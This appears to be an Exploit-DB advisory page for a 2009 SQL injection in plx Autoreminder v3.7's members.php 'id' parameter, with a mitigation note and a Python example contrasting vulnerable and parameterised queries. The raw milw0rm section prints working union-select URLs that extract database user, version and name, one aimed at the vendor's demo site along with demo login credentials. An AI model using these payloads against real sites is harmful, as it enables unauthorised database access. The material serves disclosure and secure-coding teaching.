Vendor: Autoreminder
By: ZoRLu
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Autoreminder
Affected Version From: 3.7
Affected Version To: 3.7
Patch Exists: NO
Related CWE: N/A
CPE: a:plx_web_dev:autoreminder
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

plx Autoreminder v3.7 (id) R-Sql Injection

An SQL injection vulnerability in plx Autoreminder v3.7 allows an authenticated attacker to execute arbitrary SQL commands via the 'id' parameter of the 'members.php' script. The published request appends a 'union select' to the vulnerable query and uses 'concat()' to return the database user name, server version and database name in a single column; the same 'union select' technique can be used to extract other data from the database.

Mitigation:

The 'id' parameter should be validated as an integer before it reaches the SQL query, so that injected SQL is never passed to the database.
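As an added illustration (not the Autoreminder code, which the page does not show), the following contrasts the query pattern the advisory describes with a hardened lookup, using an in-memory SQLite database with constructed rows; the `reminders` and `members` tables and their columns are assumptions, and `sqlite_version()` stands in for MySQL's `version()`.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    # Constructed sample data; the table and column names are assumptions,
    # since the advisory does not show the application's schema.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE reminders(id INTEGER, owner TEXT, note TEXT);
        INSERT INTO reminders VALUES (1, 'alice', 'renew cert');
        CREATE TABLE members(username TEXT, password_hash TEXT);
        INSERT INTO members VALUES ('admin', 'hash-placeholder');
    """)
    return con

def lookup_vulnerable(con, raw_id):
    # The anti-pattern behind the advisory: the request parameter is pasted
    # straight into the SQL text, so a value such as
    # '999999999 union select ...' becomes part of the statement.
    sql = f"SELECT id, owner, note FROM reminders WHERE id = {raw_id}"
    return con.execute(sql).fetchall()

def is_valid_id(raw_id):
    # 'id' is only ever an integer, so anything else is rejected outright
    # (ASCII check because str.isdecimal also accepts non-ASCII digits).
    return raw_id.isascii() and raw_id.isdecimal()

def lookup_hardened(con, raw_id):
    # Mitigation: validate first, then bind the value as a parameter so the
    # driver never interprets it as SQL.
    if not is_valid_id(raw_id):
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, owner, note FROM reminders WHERE id = ?"
    return con.execute(sql, (int(raw_id),)).fetchall()

# Constructed value in the shape of the advisory's 'id' parameter: a non-existent
# id followed by a UNION that pulls a row from an unrelated table. The injected
# SELECT must return as many columns as the original query (3 here), which is
# why the published URL pads its select list with numbered placeholders.
INJECTED_ID = ("999999999 union select username, password_hash, sqlite_version() "
               "from members")

if __name__ == "__main__":
    con = make_db()
    print(lookup_vulnerable(con, INJECTED_ID))   # the members row leaks
    print(is_valid_id(INJECTED_ID), is_valid_id("1"))
    print(lookup_hardened(con, "1"))
```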

Exploit-DB raw data:

[~] plx Autoreminder v3.7 (id) R-Sql Inj
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  msn: trt-turk@hotmail.com
[~]
[~] Date: 04.01.09
[~]
[~] Home: z0rlu.blogspot.com / www.experl.com 
[~]
[~] NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
[~]
[~] MOST IMPORTANT NOTE: whoever hacks the demos, may they be a ball ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------

you must log in to the site

R-Sql

z0rlu.blogspot.com/members.php?s=newar&edmode=1&id=999999999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16

for demo:

user: trt-turk@hotmail.com

pass: salla1

http://www.plxwebdev.com/demos/autoreminder/members.php?s=newar&edmode=1&id=999999999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Scriptorium & h4ckinger & Cyber_Thief & BLaSTeR & Ahmet and all experl.com users :)
[~]
[~] yildirimordulari.org  &  experl.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-01-04]